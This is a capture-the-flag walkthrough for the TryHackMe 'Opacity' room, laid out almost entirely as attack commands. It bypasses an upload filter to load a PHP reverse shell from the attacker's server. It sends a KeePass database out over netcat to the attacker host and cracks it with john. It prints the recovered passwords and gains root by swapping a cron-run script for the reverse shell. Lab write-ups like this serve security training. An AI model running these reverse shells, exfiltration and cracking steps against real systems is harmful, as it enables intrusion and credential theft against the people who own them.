Opacity

Room Link: https://tryhackme.com/room/opacity

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

No other ports found

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Found this page, I tried different extensions but it looks like it only accepts extentsions that images uses such as .jpg and .png

Initial Shell

Kali

git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
subl php-reverse-shell.php 

Kali #1

python2 -m SimpleHTTPServer 81

Kali #2

nc -lvnp 1337

Browser

http://$KALI:81/php-reverse-shell.php#.jpg

Get autocomplete

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Transfer file

In /opt we find a keepass file so I transfered back to Kali to try to crack it

Kali(receiving)

nc -l -p 1234 > dataset.kdbx

Victim(sending)

nc -w 3 $KALI 1234 < dataset.kdbx

Crack KeePass

Kali

/opt/john/keepass2john dataset.kdbx > johnkeepass.txt
john --wordlist=/usr/share/wordlists/rockyou.txt johnkeepass.txt 

Kali

keepassx dataset.kdbx 
Password: 741852963

TCP/22 - SSH

Kali

ssh sysadmin@$VICTIM
Password: Cl0udP4ss40p4city#8700

PSPY

Kali

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy32 
python2 -m SimpleHTTPServer 81

Victim

wget http://$KALI:81/pspy32 
chmod +x pspy32 
./pspy32

The script calls backup.inc.php in the lib folder, we can't edit this file but we can delete it and replace it so I copied the same php reverse shell script that was used before and replaced backup. After that I just waited until the script ran on its own.

Kali #1

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy32 
python2 -m SimpleHTTPServer 81

Victim

rm -f backup.inc.php
wget http://10.10.215.36:81/php-reverse-shell.php 
cp php-reverse-shell.php backup.inc.php

Kali #2

nc -lvnp 1337